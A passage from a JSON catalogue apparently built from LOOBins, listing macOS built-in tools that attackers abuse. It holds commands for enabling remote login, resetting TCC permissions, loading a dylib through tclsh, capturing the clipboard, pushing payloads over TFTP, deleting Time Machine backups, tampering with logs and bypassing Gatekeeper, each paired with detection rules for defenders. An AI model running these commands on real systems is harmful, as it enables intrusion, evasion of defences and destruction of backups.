Sysadminctl","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_enable_guest_account.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysadminctl.yml","https://ss64.com/mac/sysadminctl.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:sysctl:4c999f9f530dbf76","toolId":"loobins:sysctl","toolName":"sysctl","name":"Use sysctl to gather macOS hardware info.","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"sysctl -n hw.model","description":"sysctl can be used to gather interesting macOS host data, including hardware information, memory size, logical cpu information, etc.","mitre":[],"fullPath":["/usr/sbin/sysctl"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect activity related to sysctl in an interactive shell","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/sysctl_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/sysctl.yml","https://evasions.checkpoint.com/src/MacOS/macos.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:system_profiler:94bcdf5d6eceb23d","toolId":"loobins:system_profiler","toolName":"system_profiler","name":"Listing the available datatypes","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"system_profiler -listDataTypes","description":"List all available sub-systems to get information from.","mitre":[],"fullPath":["/usr/sbin/system_profiler"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using System_Profiler","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml"},{"type":"Jamf Protect: Detect system_profiler activity that gathers system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml","https://macosbin.com/bin/system_profiler","https://ss64.com/osx/system_profiler.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:system_profiler:280ec67aa6e4fde6","toolId":"loobins:system_profiler","toolName":"system_profiler","name":"Print hardware information","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"system_profiler SPHardwareDataType","description":"Prints an overview of the hardware of the current machine, including its model name and serial number.","mitre":[],"fullPath":["/usr/sbin/system_profiler"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using System_Profiler","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml"},{"type":"Jamf Protect: Detect system_profiler activity that gathers system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml","https://macosbin.com/bin/system_profiler","https://ss64.com/osx/system_profiler.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:system_profiler:04c45f4b68269440","toolId":"loobins:system_profiler","toolName":"system_profiler","name":"Print software information","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"system_profiler SPSoftwareDataType","description":"Prints an overview of the software of the current machine, including the exact macOS version number.","mitre":[],"fullPath":["/usr/sbin/system_profiler"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using System_Profiler","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml"},{"type":"Jamf Protect: Detect system_profiler activity that gathers system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml","https://macosbin.com/bin/system_profiler","https://ss64.com/osx/system_profiler.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:system_profiler:5501ae493999a365","toolId":"loobins:system_profiler","toolName":"system_profiler","name":"Print the information of developer tools","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"system_profiler SPDeveloperToolsDataType","description":"Prints the currently active version of the Xcode developer tools and SDK.","mitre":[],"fullPath":["/usr/sbin/system_profiler"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using System_Profiler","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml"},{"type":"Jamf Protect: Detect system_profiler activity that gathers system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml","https://macosbin.com/bin/system_profiler","https://ss64.com/osx/system_profiler.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:system_profiler:ae2eb524d89a31c7","toolId":"loobins:system_profiler","toolName":"system_profiler","name":"Print power and battery information","source":"LOOBins","platform":["macOS"],"capability":["Discovery"],"nativeCategory":["Discovery"],"command":"system_profiler SPPowerDataType","description":"Prints power and battery information, including the current AC wattage and battery cycle count.","mitre":[],"fullPath":["/usr/sbin/system_profiler"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"System Information Discovery Using System_Profiler","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_system_profiler_discovery.yml"},{"type":"Jamf Protect: Detect system_profiler activity that gathers system information","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/system_profiler_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/system_profiler.yml","https://macosbin.com/bin/system_profiler","https://ss64.com/osx/system_profiler.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:systemsetup:92b5002344055d13","toolId":"loobins:systemsetup","toolName":"systemsetup","name":"Enable Remote Login","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"sudo systemsetup -setremotelogin on","description":"systemsetup can be used to enable SSH for remote login","mitre":[],"fullPath":["/usr/sbin/systemsetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command line argument detection containing (args contain systemsetup AND (-setremoteappleevents OR -setremotelogin) AND on)","value":"https://www.elastic.co/guide/en/security/current/remote-ssh-login-enabled-via-systemsetup-command.html"},{"type":"Jamf Protect: Detect systemsetup activity that enables remotelogin or appleremoteevents","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/systemsetup_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/systemsetup.yml","https://ss64.com/osx/systemsetup.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:systemsetup:8cf0ab2815bd3147","toolId":"loobins:systemsetup","toolName":"systemsetup","name":"Enable Remote Apple Events","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"sudo systemsetup -setremoteappleevents on","description":"systemsetup can be used to enable Remote Apple Events. \nSet whether the system responds to events sent by other computers (such as AppleScripts).\n","mitre":[],"fullPath":["/usr/sbin/systemsetup"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command line argument detection containing (args contain systemsetup AND (-setremoteappleevents OR -setremotelogin) AND on)","value":"https://www.elastic.co/guide/en/security/current/remote-ssh-login-enabled-via-systemsetup-command.html"},{"type":"Jamf Protect: Detect systemsetup activity that enables remotelogin or appleremoteevents","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/systemsetup_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/systemsetup.yml","https://ss64.com/osx/systemsetup.html"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tccutil:a2a8e1b9b60cb400","toolId":"loobins:tccutil","toolName":"tccutil","name":"Use the tccutil to reset specific permissions","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"tccutil reset AppleEvents","description":"Banshee Stealer resets the permissions that have already been allowed to applications on the system, which will cause the user to be prompted to give them again. This action may be intended to trick the user into unknowingly giving authorizations to the malware.","mitre":[],"fullPath":["/usr/bin/tccutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tccutil.yml","https://ss64.com/mac/tccutil.html","https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tccutil:74f4c88c5da560ab","toolId":"loobins:tccutil","toolName":"tccutil","name":"Use the tccutil to reset specific permissions for an application","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"tccutil reset AppleEvents com.apple.Terminal","description":"Attackers use tccutil to reset permissions for services like Camera, Microphone, or AppleEvents.","mitre":[],"fullPath":["/usr/bin/tccutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tccutil.yml","https://ss64.com/mac/tccutil.html","https://research.checkpoint.com/2025/banshee-macos-stealer-that-stole-code-from-macos-xprotect/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tclsh:73ff199dee11f733","toolId":"loobins:tclsh","toolName":"tclsh","name":"Execute malicious dynamic library (.dylib) from standard input","source":"LOOBins","platform":["macOS"],"capability":["Execution"],"nativeCategory":["Execution"],"command":"echo \"load bad.dylib\" | tclsh","description":"An attacker can execute a malicious .dylib from stdin by echoing a load command and piping to tclsh. This will bypass code signing requirements.","mitre":[],"fullPath":["/usr/bin/tclsh"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Recommendations included in resource below. No formal detection content at this time.","value":"https://medium.com/specter-ops-posts/dylib-loads-that-tickle-your-fancy-d25196addd8c"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tclsh.yml","https://medium.com/specter-ops-posts/dylib-loads-that-tickle-your-fancy-d25196addd8c"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:textutil:51b3787cb7533e11","toolId":"loobins:textutil","toolName":"textutil","name":"Use the textutil to read several files and build a new file","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion","Collection"],"nativeCategory":["Defense Evasion","Collection"],"command":"textutil -convert html Quote.doc secondQuote.doc","description":"A one-liner can load the content of multiple RTF files in a directory, concatenate their contents, and write the results out as a new file. This provides two sub-use-cases; one is building a malicious file from a collection of smaller files which could evade both network and host-based security controls as the traditional means of signature-based detection would be redundant; two is concatenating the content of several, potentially sensitive files before exfiltration. This command can also be looped to iterate a directory of files.","mitre":[],"fullPath":["/usr/bin/textutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))","value":"Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/textutil.yml","https://osxdaily.com/tag/textutil/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:textutil:4dc3a5da2507547e","toolId":"loobins:textutil","toolName":"textutil","name":"Capture clipboard content","source":"LOOBins","platform":["macOS"],"capability":["Credential Access","Collection"],"nativeCategory":["Credential Access","Collection"],"command":"pbpaste | textutil -stdin -info > Clipboard.txt","description":"By leveraging another command line tool, pbpaste, it is possible to write a one-liner which captures the content of the clipboard. If an attacker already has access to the system, the attacker could run this command to obtain sensitive information such as a password and then elevate their privileges or exfiltrate the information.","mitre":[],"fullPath":["/usr/bin/textutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))","value":"Command Line Argument Detection (args contain textutil AND (-convert OR -stdin OR pbpaste))"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/textutil.yml","https://osxdaily.com/tag/textutil/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tftp:7e0e23e01b3fdd09","toolId":"loobins:tftp","toolName":"tftp","name":"Activate the built-in TFTP server via launchctl","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement","Persistence"],"nativeCategory":["Lateral Movement","Persistence"],"command":"sudo launchctl load -w /System/Library/LaunchDaemons/tftp.plist\n\n# Create placeholder for each file to be received\nsudo touch /private/tftpboot/payload.sh && sudo chmod 666 /private/tftpboot/payload.sh","description":"macOS ships with a launchd plist for tftpd at /System/Library/LaunchDaemons/tftp.plist. Loading it with launchctl starts the TFTP server on UDP port 69, serving /private/tftpboot. Requires root. A placeholder file must be created for each file to be transferred, as the default configuration does not allow tftpd to create new files.","mitre":[],"fullPath":["/usr/bin/tftp","/usr/libexec/tftpd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml","https://ss64.com/mac/tftp.html","https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp","https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp","https://attack.mitre.org/techniques/T1105/","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tftp:9714c3c02da83a7b","toolId":"loobins:tftp","toolName":"tftp","name":"Transfer a file to a target using the tftp client","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement"],"nativeCategory":["Lateral Movement"],"command":"tftp <TARGET_IP> << EOF\nbinary\nput /tmp/payload.sh payload.sh\nquit\nEOF","description":"The built-in tftp client can push files to a remote TFTP server. The binary mode flag ensures files are not corrupted during transfer.","mitre":[],"fullPath":["/usr/bin/tftp","/usr/libexec/tftpd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml","https://ss64.com/mac/tftp.html","https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp","https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp","https://attack.mitre.org/techniques/T1105/","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tftp:bc764b7dca517eae","toolId":"loobins:tftp","toolName":"tftp","name":"Run unprivileged TFTP server on a non-standard port","source":"LOOBins","platform":["macOS"],"capability":["Lateral Movement","Defense Evasion","Persistence"],"nativeCategory":["Lateral Movement","Defense Evasion","Persistence"],"command":"mkdir -p /tmp/tftp_server && chmod 777 /tmp/tftp_server\ntee /tmp/com.user.tftp.plist > /dev/null << 'EOF'\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple Computer//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n <key>Label</key>\n <string>com.user.tftp</string>\n <key>WorkingDirectory</key>\n <string>/tmp/tftp_server</string>\n <key>ProgramArguments</key>\n <array>\n <string>/usr/libexec/tftpd</string>\n <string>-w</string>\n <string>-l</string>\n <string>-u</string>\n <string>$(whoami)</string>\n </array>\n <key>inetdCompatibility</key>\n <dict>\n <key>Wait</key>\n <true/>\n </dict>\n <key>Sockets</key>\n <dict>\n <key>Listeners</key>\n <dict>\n <key>SockServiceName</key>\n <string>6969</string>\n <key>SockType</key>\n <string>dgram</string>\n <key>SockFamily</key>\n <string>IPv4</string>\n </dict>\n </dict>\n</dict>\n</plist>\nEOF\nlaunchctl load -w /tmp/com.user.tftp.plist","description":"Without root access, tftpd can be loaded from a user-created launchd plist stored anywhere on disk (e.g., /tmp). Passing the -w flag allows tftpd to create new files on write, removing the placeholder requirement. The server can be bound to any unprivileged port.","mitre":[],"fullPath":["/usr/bin/tftp","/usr/libexec/tftpd"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"No detections at time of publishing","value":"No detections at time of publishing"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tftp.yml","https://ss64.com/mac/tftp.html","https://en.wikipedia.org/https://hackviser.com/tactics/pentesting/services/tftp","https://www.stamus-networks.com/blog/uncovered-uncovering-risk-exposure-from-publicly-accessible-unauthenticated-tftp","https://attack.mitre.org/techniques/T1105/","https://blog.talosintelligence.com/bad-apples-weaponizing-native-macos-primitives-for-movement-and-execution/"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tmutil:00548da211e6bb02","toolId":"loobins:tmutil","toolName":"tmutil","name":"Disable Time Machine","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Impact"],"command":"tmutil disable","description":"The following command disables Time Machine. An attacker can use this to prevent backups from occurring.","mitre":[],"fullPath":["/usr/bin/tmutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect the deletion of localsnapshots","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity"},{"type":"Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml"},{"type":"Sigma: Time Machine Backup Disabled Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml"},{"type":"Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml","https://theevilbit.github.io/posts/cve_2020_9771/","https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tmutil:597a7c20b410d2a8","toolId":"loobins:tmutil","toolName":"tmutil","name":"Delete a backup","source":"LOOBins","platform":["macOS"],"capability":[],"nativeCategory":["Impact"],"command":"tmutil delete /path/to/backup","description":"The following command deletes the specified backup. An adversary may perform this action before launching a ransomware attack to prevent the victim from restoring their files.","mitre":[],"fullPath":["/usr/bin/tmutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect the deletion of localsnapshots","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity"},{"type":"Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml"},{"type":"Sigma: Time Machine Backup Disabled Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml"},{"type":"Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml","https://theevilbit.github.io/posts/cve_2020_9771/","https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tmutil:8e499d87e4d49768","toolId":"loobins:tmutil","toolName":"tmutil","name":"Restore a backup","source":"LOOBins","platform":["macOS"],"capability":["Collection"],"nativeCategory":["Collection"],"command":"tmutil restore /path/to/backup","description":"The following command restore the specified backup. An attacker can use this to restore a backup of a sensitive file that was deleted.","mitre":[],"fullPath":["/usr/bin/tmutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect the deletion of localsnapshots","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity"},{"type":"Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml"},{"type":"Sigma: Time Machine Backup Disabled Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml"},{"type":"Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml","https://theevilbit.github.io/posts/cve_2020_9771/","https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tmutil:13d81191962d0f5c","toolId":"loobins:tmutil","toolName":"tmutil","name":"Tamper with system logs","source":"LOOBins","platform":["macOS"],"capability":["Privilege Escalation"],"nativeCategory":["Privilege Escalation"],"command":"mkdir /tmp/snapshot\ntmutil localsnapshot\ntmutil listlocalsnapshots /\nmount_apfs -o noowners -s com.apple.TimeMachine.2023-05-01-090000.local /System/Volumes/Data /tmp/snapshot\nopen /tmp/snapshot\nsudo vim /var/log/system.log\ntmutil restore com.apple.TimeMachine.2023-05-01-090000.local","description":"An adversary can use the snapshot and restore commands together to tamper with system logs. This is fixed in macOS 10.15.4+.","mitre":[],"fullPath":["/usr/bin/tmutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect the deletion of localsnapshots","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity"},{"type":"Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml"},{"type":"Sigma: Time Machine Backup Disabled Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml"},{"type":"Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml","https://theevilbit.github.io/posts/cve_2020_9771/","https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:tmutil:934af9b671652c59","toolId":"loobins:tmutil","toolName":"tmutil","name":"Exclude path from backup","source":"LOOBins","platform":["macOS"],"capability":["Defense Evasion"],"nativeCategory":["Defense Evasion"],"command":"tmutil addexclusion /path/to/exclude","description":"An adversary could exclude a path from Time Machine backups to prevent certain files from being backed up.","mitre":[],"fullPath":["/usr/bin/tmutil"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Jamf Protect: Detect the deletion of localsnapshots","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/tmutil_activity"},{"type":"Sigma: Time Machine Backup Deletion Attempt Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_delete_backup.yml"},{"type":"Sigma: Time Machine Backup Disabled Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_disable_backup.yml"},{"type":"Sigma: New File Exclusion Added To Time Machine Via Tmutil - MacOS","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_tmutil_exclude_file_from_backup.yml"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/tmutil.yml","https://theevilbit.github.io/posts/cve_2020_9771/","https://github.molgen.mpg.de/pages/bs/macOSnotes/mac/mac_files_tmutil.html","https://danielcortez.substack.com/p/living-off-the-land-exploring-macos-0fd"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:xattr:94a0b1454bdcb216","toolId":"loobins:xattr","toolName":"xattr","name":"Bypass Gatekeeper via xattr","source":"LOOBins","platform":["macOS"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execution","Defense Evasion"],"command":"xattr -d com.apple.quarantine FILE","description":"Use xattr to remove quarantine extended attribute from a file.","mitre":[],"fullPath":["/usr/bin/xattr"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Gatekeeper Bypass via Xattr","value":"https://github.com/SigmaHQ/sigma/blob/master/rules/macos/process_creation/proc_creation_macos_xattr_gatekeeper_bypass.yml"},{"type":"Jamf Protect: Detect activity related to xattr and extended attributes","value":"https://github.com/jamf/jamfprotect/blob/main/custom_analytic_detections/xattr_extended_attributes_activity"}],"references":["https://github.com/infosecB/LOOBins/blob/399e3c4bdddb55c7dc49beb20bfe43490eac1184/LOOBins/xattr.yml","https://megancarney.com/presentations/ExternalReport_ThreatHuntingMacOS.pdf","https://www.youtube.com/watch?v=_K4gnSuDkRM&feature=youtu.be"],"requires":[],"services":[],"aliases":[]},{"id":"loobins:xattr:3110f6b06aa87ef5","toolId":"loobins:xattr","toolName":"xattr","name":"Bypass Gatekeeper via xattr","source":"LOOBins","platform":["macOS"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execution","Defense Evasion"],"command":"xattr -d -r com.apple.quarantine *","description":"Use xattr to remove quarantine extended attribute from multiple files or directories.","mitre":[],"fullPath":["/usr/bin/xattr"],"environment":["Local host"],"availability":"Built in","verification":"Upstream reference","compatibility":"Imported from LOOBins; availability and behaviour depend on macOS version, privacy permissions and installed components. Not lab tested here.","detection":[{"type":"Gatekeeper Bypass via 